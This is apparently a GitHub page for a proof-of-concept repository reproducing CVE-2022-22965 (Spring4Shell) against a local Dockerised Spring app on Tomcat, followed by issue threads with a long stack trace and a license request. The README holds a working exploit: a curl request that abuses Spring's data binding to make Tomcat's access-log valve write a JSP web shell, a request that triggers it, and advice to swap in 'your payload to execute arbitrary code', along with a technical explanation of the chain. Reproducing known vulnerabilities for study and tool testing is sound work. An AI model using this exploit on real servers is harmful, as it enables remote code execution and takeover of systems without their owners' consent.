kirill89 / cve-2022-22965-poc Goto Github PK

View Code? Open in Web Editor NEW

27.0 2.0 24.0 123 KB

Java 63.97% HTML 18.12% Dockerfile 6.17% Shell 11.74%

cve-2022-22965-poc's Introduction

CVE-2022-22965 PoC

Minimal example of how to reproduce CVE-2022-22965 Spring RCE.

Run using docker compose

Build the application using Docker compose
```
docker-compose up --build
```
To test the app browse to http://localhost:8080/handling-form-submission-complete/greeting
Run the exploit
```
./exploits/run.sh
```
The exploit is going to create rce.jsp file in webapps/handling-form-submission-complete on the web server.
Use the exploit Browse to http://localhost:8080/handling-form-submission-complete/rce.jsp

Alternative way (debug oriented)

Run the Tomcat server in docker
```
docker run -p 8888:8080 --rm --interactive --tty --name vm1 tomcat:9.0
```
Add -p 5005:5005 -e "JAVA_OPTS=-Xdebug -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=*:5005" if you want to debug remotely.
Build the project
```
./mvnw install
```

Deploy the app

docker cp target/handling-form-submission-complete.war vm1:/usr/local/tomcat/webapps

Write the exploit

curl -X POST \
  -H "pre:<%" \
  -H "post:;%>" \
  -F 'class.module.classLoader.resources.context.parent.pipeline.first.pattern=%{pre}iSystem.out.println(123)%{post}i' \
  -F 'class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp' \
  -F 'class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/handling-form-submission-complete' \
  -F 'class.module.classLoader.resources.context.parent.pipeline.first.prefix=rce' \
  -F 'class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=' \
  http://localhost:8888/handling-form-submission-complete/greeting

The exploit is going to create rce.jsp file in webapps/handling-form-submission-complete on the web server.

Use the exploit
```
curl http://localhost:8888/handling-form-submission-complete/rce.jsp
```
Now you'll see 123 in the container's terminal. Replace System.out.println(123) with your payload to execute arbitrary code.

Short technical explanation

Spring knows how to bind form fields to Java object. In our example GreetingController handle POST requests on /greeting endpoint and binds form fields to the Greeting object.
It also supports binding of nested fields (e.g. user.info.firstname). See the AbstractNestablePropertyAccessor for references.
In our example Greeting class has two fields id and content, but actually it also has a reference to the Class object. We can use class.module.classLoader as a form data key to access the classloader.
In the fix we can see that the main change was to restrict access to most of the Class object properties, including the module one.
This behaviour allows us to set public properties of classes accessible via nested reference chain from the Greeting class. Nothing else. In most of the cases it is not even dangerous because no classes with public fields are available even from class.module.classLoader..
It becomes a problem on the Tomcat server because the classloader there has getResources accessor which allows us to continue the reference chain and access one of the instances of the AccessLogValve class.
This class is meant to write logs. We change some properties to make it write files with the name and content of our choice. We have arbitrary file write at this point.
We create jsp file with in the root of the application folder with the malicious payload. As far as jsp are automatically executed by the Tomcat we can navigate to it in the browser and eventually execute the payload. Now it is RCE.

Conditions

The exploit works only on Tomcat because it has special classloader. Although the similar reference chain may exist on other web application servers as well. It is not simply discovered yet.

The exploit requires Java 9 or above because module property was added in Java 9.

References

The server part is based on the https://gist.github.com/esell/c9731a7e2c5404af7716a6810dc33e1a step-by-step manual.
The exploit part is based on https://github.com/BobTheShoplifter/Spring4Shell-POC/blob/0c557e85ba903c7ad6f50c0306f6c8271736c35e/poc.py script.
Snyk advisory about the vulnerability is available here: https://security.snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-2436751

cve-2022-22965-poc's People

Contributors

Stargazers

Watchers

Forkers

ssjt21 cxzero adnama55 ceki aptzero w2xim3 bmvermeer r44wk zzhsec fishso jimdx lucas-yu-chen almogc-neosec flying0er toshi-snyk ilatypov ec-snyk meytalmesh gurshafriri sn-ravance

cve-2022-22965-poc's Issues

NullValueInNestedPathException when following steps in README

When I follow the steps outlined in the README I run into an exception when issuing the call to /greeting and the following stacktrace is emitted:

2022-04-04 14:20:11.624 ERROR 1 --- [nio-8080-exec-3] o.s.b.w.servlet.support.ErrorPageFilter  : Forwarding to error page from request [/greeting] due to exception [Invalid property 'class.module.classLoader.resources' of bean class [java.lang.Module]: Could not instantiate property type [org.apache.catalina.WebResourceRoot] to auto-grow nested property path; nested exception is java.lang.NoSuchMethodException: org.apache.catalina.WebResourceRoot.<init>()]

org.springframework.beans.NullValueInNestedPathException: Invalid property 'class.module.classLoader.resources' of bean class [java.lang.Module]: Could not instantiate property type [org.apache.catalina.WebResourceRoot] to auto-grow nested property path; nested exception is java.lang.NoSuchMethodException: org.apache.catalina.WebResourceRoot.<init>()
	at org.springframework.beans.AbstractNestablePropertyAccessor.newValue(AbstractNestablePropertyAccessor.java:923) ~[spring-beans-5.3.17.jar:5.3.17]
	at org.springframework.beans.AbstractNestablePropertyAccessor.createDefaultPropertyValue(AbstractNestablePropertyAccessor.java:887) ~[spring-beans-5.3.17.jar:5.3.17]
	at org.springframework.beans.AbstractNestablePropertyAccessor.setDefaultValue(AbstractNestablePropertyAccessor.java:874) ~[spring-beans-5.3.17.jar:5.3.17]
	at org.springframework.beans.AbstractNestablePropertyAccessor.getNestedPropertyAccessor(AbstractNestablePropertyAccessor.java:846) ~[spring-beans-5.3.17.jar:5.3.17]
	at org.springframework.beans.AbstractNestablePropertyAccessor.getPropertyAccessorForPropertyPath(AbstractNestablePropertyAccessor.java:820) ~[spring-beans-5.3.17.jar:5.3.17]
	at org.springframework.beans.AbstractNestablePropertyAccessor.getPropertyAccessorForPropertyPath(AbstractNestablePropertyAccessor.java:821) ~[spring-beans-5.3.17.jar:5.3.17]
	at org.springframework.beans.AbstractNestablePropertyAccessor.getPropertyAccessorForPropertyPath(AbstractNestablePropertyAccessor.java:821) ~[spring-beans-5.3.17.jar:5.3.17]
	at org.springframework.beans.AbstractNestablePropertyAccessor.getPropertyAccessorForPropertyPath(AbstractNestablePropertyAccessor.java:821) ~[spring-beans-5.3.17.jar:5.3.17]
	at org.springframework.beans.AbstractNestablePropertyAccessor.setPropertyValue(AbstractNestablePropertyAccessor.java:256) ~[spring-beans-5.3.17.jar:5.3.17]
	at org.springframework.beans.AbstractPropertyAccessor.setPropertyValues(AbstractPropertyAccessor.java:104) ~[spring-beans-5.3.17.jar:5.3.17]
	at org.springframework.validation.DataBinder.applyPropertyValues(DataBinder.java:856) ~[spring-context-5.3.15.jar:5.3.15]
	at org.springframework.validation.DataBinder.doBind(DataBinder.java:751) ~[spring-context-5.3.15.jar:5.3.15]
	at org.springframework.web.bind.WebDataBinder.doBind(WebDataBinder.java:198) ~[spring-web-5.3.15.jar:5.3.15]
	at org.springframework.web.bind.ServletRequestDataBinder.bind(ServletRequestDataBinder.java:118) ~[spring-web-5.3.15.jar:5.3.15]
	at org.springframework.web.servlet.mvc.method.annotation.ServletModelAttributeMethodProcessor.bindRequestParameters(ServletModelAttributeMethodProcessor.java:158) ~[spring-webmvc-5.3.15.jar:5.3.15]
	at org.springframework.web.method.annotation.ModelAttributeMethodProcessor.resolveArgument(ModelAttributeMethodProcessor.java:171) ~[spring-web-5.3.15.jar:5.3.15]
	at org.springframework.web.method.support.HandlerMethodArgumentResolverComposite.resolveArgument(HandlerMethodArgumentResolverComposite.java:122) ~[spring-web-5.3.15.jar:5.3.15]
	at org.springframework.web.method.support.InvocableHandlerMethod.getMethodArgumentValues(InvocableHandlerMethod.java:179) ~[spring-web-5.3.15.jar:5.3.15]
	at org.springframework.web.method.support.InvocableHandlerMethod.invokeForRequest(InvocableHandlerMethod.java:146) ~[spring-web-5.3.15.jar:5.3.15]
	at org.springframework.web.servlet.mvc.method.annotation.ServletInvocableHandlerMethod.invokeAndHandle(ServletInvocableHandlerMethod.java:117) ~[spring-webmvc-5.3.15.jar:5.3.15]
	at org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerAdapter.invokeHandlerMethod(RequestMappingHandlerAdapter.java:895) ~[spring-webmvc-5.3.15.jar:5.3.15]
	at org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerAdapter.handleInternal(RequestMappingHandlerAdapter.java:808) ~[spring-webmvc-5.3.15.jar:5.3.15]
	at org.springframework.web.servlet.mvc.method.AbstractHandlerMethodAdapter.handle(AbstractHandlerMethodAdapter.java:87) ~[spring-webmvc-5.3.15.jar:5.3.15]
	at org.springframework.web.servlet.DispatcherServlet.doDispatch(DispatcherServlet.java:1067) ~[spring-webmvc-5.3.15.jar:5.3.15]
	at org.springframework.web.servlet.DispatcherServlet.doService(DispatcherServlet.java:963) ~[spring-webmvc-5.3.15.jar:5.3.15]
	at org.springframework.web.servlet.FrameworkServlet.processRequest(FrameworkServlet.java:1006) ~[spring-webmvc-5.3.15.jar:5.3.15]
	at org.springframework.web.servlet.FrameworkServlet.doPost(FrameworkServlet.java:909) ~[spring-webmvc-5.3.15.jar:5.3.15]
	at javax.servlet.http.HttpServlet.service(HttpServlet.java:681) ~[servlet-api.jar:4.0.FR]
	at org.springframework.web.servlet.FrameworkServlet.service(FrameworkServlet.java:883) ~[spring-webmvc-5.3.15.jar:5.3.15]
	at javax.servlet.http.HttpServlet.service(HttpServlet.java:764) ~[servlet-api.jar:4.0.FR]
	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:227) ~[catalina.jar:9.0.62]
	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162) ~[catalina.jar:9.0.62]
	at org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:53) ~[tomcat-websocket.jar:9.0.62]
	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189) ~[catalina.jar:9.0.62]
	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162) ~[catalina.jar:9.0.62]
	at org.springframework.web.filter.RequestContextFilter.doFilterInternal(RequestContextFilter.java:100) ~[spring-web-5.3.15.jar:5.3.15]
	at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:117) ~[spring-web-5.3.15.jar:5.3.15]
	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189) ~[catalina.jar:9.0.62]
	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162) ~[catalina.jar:9.0.62]
	at org.springframework.web.filter.FormContentFilter.doFilterInternal(FormContentFilter.java:93) ~[spring-web-5.3.15.jar:5.3.15]
	at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:117) ~[spring-web-5.3.15.jar:5.3.15]
	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189) ~[catalina.jar:9.0.62]
	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162) ~[catalina.jar:9.0.62]
	at org.springframework.boot.web.servlet.support.ErrorPageFilter.doFilter(ErrorPageFilter.java:126) ~[spring-boot-2.6.3.jar:2.6.3]
	at org.springframework.boot.web.servlet.support.ErrorPageFilter.access$000(ErrorPageFilter.java:64) ~[spring-boot-2.6.3.jar:2.6.3]
	at org.springframework.boot.web.servlet.support.ErrorPageFilter$1.doFilterInternal(ErrorPageFilter.java:101) ~[spring-boot-2.6.3.jar:2.6.3]
	at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:117) ~[spring-web-5.3.15.jar:5.3.15]
	at org.springframework.boot.web.servlet.support.ErrorPageFilter.doFilter(ErrorPageFilter.java:119) ~[spring-boot-2.6.3.jar:2.6.3]
	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189) ~[catalina.jar:9.0.62]
	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162) ~[catalina.jar:9.0.62]
	at org.springframework.web.filter.CharacterEncodingFilter.doFilterInternal(CharacterEncodingFilter.java:201) ~[spring-web-5.3.15.jar:5.3.15]
	at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:117) ~[spring-web-5.3.15.jar:5.3.15]
	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189) ~[catalina.jar:9.0.62]
	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162) ~[catalina.jar:9.0.62]
	at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:197) ~[catalina.jar:9.0.62]
	at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:97) ~[catalina.jar:9.0.62]
	at org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:541) ~[catalina.jar:9.0.62]
	at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:135) ~[catalina.jar:9.0.62]
	at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:92) ~[catalina.jar:9.0.62]
	at org.apache.catalina.valves.AbstractAccessLogValve.invoke(AbstractAccessLogValve.java:687) ~[catalina.jar:9.0.62]
	at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:78) ~[catalina.jar:9.0.62]
	at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:360) ~[catalina.jar:9.0.62]
	at org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:399) ~[tomcat-coyote.jar:9.0.62]
	at org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:65) ~[tomcat-coyote.jar:9.0.62]
	at org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:890) ~[tomcat-coyote.jar:9.0.62]
	at org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1743) ~[tomcat-coyote.jar:9.0.62]
	at org.apache.tomcat.util.net.SocketProcessorBase.run(SocketProcessorBase.java:49) ~[tomcat-coyote.jar:9.0.62]
	at org.apache.tomcat.util.threads.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1191) ~[tomcat-util.jar:9.0.62]
	at org.apache.tomcat.util.threads.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:659) ~[tomcat-util.jar:9.0.62]
	at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61) ~[tomcat-util.jar:9.0.62]
	at java.base/java.lang.Thread.run(Thread.java:829) ~[na:na]
Caused by: java.lang.NoSuchMethodException: org.apache.catalina.WebResourceRoot.<init>()
	at java.base/java.lang.Class.getConstructor0(Class.java:3349) ~[na:na]
	at java.base/java.lang.Class.getDeclaredConstructor(Class.java:2553) ~[na:na]
	at org.springframework.beans.AbstractNestablePropertyAccessor.newValue(AbstractNestablePropertyAccessor.java:914) ~[spring-beans-5.3.17.jar:5.3.17]
	... 70 common frames omitted

Any ideas what I need to do to get the curl to complete?

Include LICENSE file

Could you please attach a license file, for example MIT, Apache 2.0, GPL. A license file would make clear what I am allowed to do with this code and what not.
About the background: I am a student at the University of Ulm and am currently writing my my master thesis.
For my empirical study I am investigating vulnerable projects and evaluating different security tools.
I would like to choose your project as one of my test cases for my empirical study.
However, since there is no license file available, I am not sure if I am allowed to use this code for my empirical study or not.
Thank you! :)

Recommend Projects

React

A declarative, efficient, and flexible JavaScript library for building user interfaces.
Vue.js

🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
Typescript

TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
TensorFlow

An Open Source Machine Learning Framework for Everyone
Django

The Web framework for perfectionists with deadlines.
Laravel

A PHP framework for web artisans
D3

Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

javascript

JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
web

Some thing interesting about web. New door for the world.
server

A server is a program made to process requests and deliver data to clients.
Machine learning

Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Visualization

Some thing interesting about visualization, use data art
Game

Some thing interesting about game, make everyone happy.

Recommend Org

Facebook

We are working to build community through open source technology. NB: members must have two-factor auth.
Microsoft

Open source projects and samples from Microsoft.
Google

Google ❤️ Open Source for everyone.
Alibaba

Alibaba Open Source for everyone
D3

Data-Driven Documents codes.
Tencent

China tencent open source team.